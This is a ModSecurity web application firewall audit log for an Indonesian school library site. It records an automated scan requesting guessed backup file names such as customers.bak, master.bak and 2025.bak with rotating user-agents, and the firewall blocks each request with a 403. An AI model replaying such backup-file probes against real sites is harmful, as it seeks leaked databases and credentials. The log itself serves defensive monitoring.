Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --498cb605-Z-- --a1f8f52d-A-- [18/May/2025:11:51:23 +0700] aClnSxir-GlPrFVVKe5E1QAAAFM 103.236.140.4 56832 103.236.140.4 8181 --a1f8f52d-B-- GET /erpustakaansmkn22jakartaschid.backup HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.91 Safari/537.36 OPR/55.0.2994.61 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 153190670 --a1f8f52d-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --a1f8f52d-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".backup"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543883183828 2002 (- - -) Stopwatch2: 1747543883183828 2002; combined=805, p1=377, p2=392, p3=0, p4=0, p5=36, sr=69, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a1f8f52d-Z-- --48884007-A-- [18/May/2025:11:51:23 +0700] aClnS_ypzAd0elWOk7o8xwAAAAE 103.236.140.4 56796 103.236.140.4 8181 --48884007-B-- GET /customers.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36 OPR/53.0.2907.106 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 153190675 --48884007-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --48884007-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543883187977 2001 (- - -) Stopwatch2: 1747543883187977 2001; combined=811, p1=306, p2=468, p3=0, p4=0, p5=37, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --48884007-Z-- --e89fdd6e-A-- [18/May/2025:11:51:23 +0700] aClnS_ypzAd0elWOk7o8yAAAABA 103.236.140.4 56796 103.236.140.4 8181 --e89fdd6e-B-- GET /php.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.109 Safari/537.36 OPR/51.0.2830.34 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 117609740 --e89fdd6e-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --e89fdd6e-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543883197817 1792 (- - -) Stopwatch2: 1747543883197817 1792; combined=706, p1=377, p2=301, p3=0, p4=0, p5=28, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e89fdd6e-Z-- --1a876f7f-A-- [18/May/2025:11:51:23 +0700] aClnS0PRqak7bVuUS6cS6wAAAIo 103.236.140.4 56816 103.236.140.4 8181 --1a876f7f-B-- GET /my.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (X11; Linux i686 on x86_64; rv:67.0.2) Gecko/20100101 Firefox/67.0.2 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 110436745 --1a876f7f-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --1a876f7f-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543883198148 2094 (- - -) Stopwatch2: 1747543883198148 2094; combined=737, p1=394, p2=315, p3=0, p4=0, p5=27, sr=90, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1a876f7f-Z-- --f15cd93a-A-- [18/May/2025:11:51:23 +0700] aClnS_ypzAd0elWOk7o8yQAAABc 103.236.140.4 56796 103.236.140.4 8181 --f15cd93a-B-- GET /store.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.98 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 152600662 --f15cd93a-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --f15cd93a-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543883199800 1812 (- - -) Stopwatch2: 1747543883199800 1812; combined=642, p1=306, p2=309, p3=0, p4=0, p5=27, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f15cd93a-Z-- --6475451e-A-- [18/May/2025:11:51:23 +0700] aClnS_ypzAd0elWOk7o8ygAAABg 103.236.140.4 56796 103.236.140.4 8181 --6475451e-B-- GET /vb.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:63.0.1) Gecko/20100101 Firefox/63.0.1 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 151093381 --6475451e-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --6475451e-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543883204538 1585 (- - -) Stopwatch2: 1747543883204538 1585; combined=660, p1=346, p2=285, p3=0, p4=0, p5=28, sr=75, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6475451e-Z-- --940bc456-A-- [18/May/2025:11:51:23 +0700] aClnS_ypzAd0elWOk7o8ywAAAAU 103.236.140.4 56796 103.236.140.4 8181 --940bc456-B-- GET /master.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36 OPR/53.0.2907.106 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 152600669 --940bc456-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --940bc456-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543883210890 1563 (- - -) Stopwatch2: 1747543883210890 1563; combined=624, p1=307, p2=290, p3=0, p4=0, p5=27, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --940bc456-Z-- --3aebc368-A-- [18/May/2025:11:51:23 +0700] aClnS_ypzAd0elWOk7o8zAAAAAY 103.236.140.4 56796 103.236.140.4 8181 --3aebc368-B-- GET /2012.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1; rv:52.2.1) Gecko/20100101 Firefox/52.2.1 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 152600678 --3aebc368-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --3aebc368-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543883223683 1798 (- - -) Stopwatch2: 1747543883223683 1798; combined=631, p1=304, p2=301, p3=0, p4=0, p5=26, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3aebc368-Z-- --496cea53-A-- [18/May/2025:11:51:23 +0700] aClnS_ypzAd0elWOk7o8zQAAABM 103.236.140.4 56796 103.236.140.4 8181 --496cea53-B-- GET /media.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36 OPR/53.0.2907.106 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 110436772 --496cea53-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --496cea53-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543883234011 2040 (- - -) Stopwatch2: 1747543883234011 2040; combined=832, p1=384, p2=418, p3=0, p4=0, p5=30, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --496cea53-Z-- --090d2b5b-A-- [18/May/2025:11:51:23 +0700] aClnS0PRqak7bVuUS6cS7QAAAIs 103.236.140.4 58354 103.236.140.4 8181 --090d2b5b-B-- GET /smkn22jakarta_sch_id.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36 OPR/53.0.2907.106 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 117360883 --090d2b5b-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --090d2b5b-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543883235250 2076 (- - -) Stopwatch2: 1747543883235250 2076; combined=853, p1=380, p2=447, p3=0, p4=0, p5=26, sr=108, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --090d2b5b-Z-- --ffddcd42-A-- [18/May/2025:11:51:23 +0700] aClnS_ypzAd0elWOk7o8zgAAAA8 103.236.140.4 56796 103.236.140.4 8181 --ffddcd42-B-- GET /asp.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (X11; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.75 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 110436775 --ffddcd42-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --ffddcd42-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543883237242 1718 (- - -) Stopwatch2: 1747543883237242 1718; combined=699, p1=336, p2=334, p3=0, p4=0, p5=28, sr=70, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ffddcd42-Z-- --1095cf12-A-- [18/May/2025:11:51:23 +0700] aClnS_ypzAd0elWOk7o8zwAAAAI 103.236.140.4 56796 103.236.140.4 8181 --1095cf12-B-- GET /com.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:60.3.0) Gecko/20100101 Firefox/60.3.0 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 151093390 --1095cf12-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --1095cf12-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543883246085 1664 (- - -) Stopwatch2: 1747543883246085 1664; combined=688, p1=353, p2=307, p3=0, p4=0, p5=28, sr=70, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1095cf12-Z-- --8f1aec6d-A-- [18/May/2025:11:51:23 +0700] aClnS_ypzAd0elWOk7o81AAAABE 103.236.140.4 56796 103.236.140.4 8181 --8f1aec6d-B-- GET /smkn22jakarta.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (X11; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36 OPR/53.0.2907.99 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 113175814 --8f1aec6d-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --8f1aec6d-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543883277778 1966 (- - -) Stopwatch2: 1747543883277778 1966; combined=732, p1=315, p2=391, p3=0, p4=0, p5=26, sr=69, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8f1aec6d-Z-- --f41f577f-A-- [18/May/2025:11:51:23 +0700] aClnS_ypzAd0elWOk7o81gAAAAs 103.236.140.4 56796 103.236.140.4 8181 --f41f577f-B-- GET /log.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.92 Safari/537.36 OPR/55.0.2994.44 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 110436818 --f41f577f-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --f41f577f-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543883310134 1694 (- - -) Stopwatch2: 1747543883310134 1694; combined=702, p1=352, p2=322, p3=0, p4=0, p5=28, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f41f577f-Z-- --4aa99615-A-- [18/May/2025:11:51:23 +0700] aClnS0PRqak7bVuUS6cS7gAAAIQ 103.236.140.4 58354 103.236.140.4 8181 --4aa99615-B-- GET /2025.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:51.0.1) Gecko/20100101 Firefox/51.0.1 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 151093435 --4aa99615-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --4aa99615-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543883316367 2125 (- - -) Stopwatch2: 1747543883316367 2125; combined=759, p1=369, p2=360, p3=0, p4=0, p5=30, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4aa99615-Z-- --ade59a75-A-- [18/May/2025:11:51:23 +0700] aClnS0PRqak7bVuUS6cS8gAAAJQ 103.236.140.4 58354 103.236.140.4 8181 --ade59a75-B-- GET /2022.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.167 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 110436840 --ade59a75-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --ade59a75-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543883345739 1924 (- - -) Stopwatch2: 1747543883345739 1924; combined=718, p1=342, p2=349, p3=0, p4=0, p5=27, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
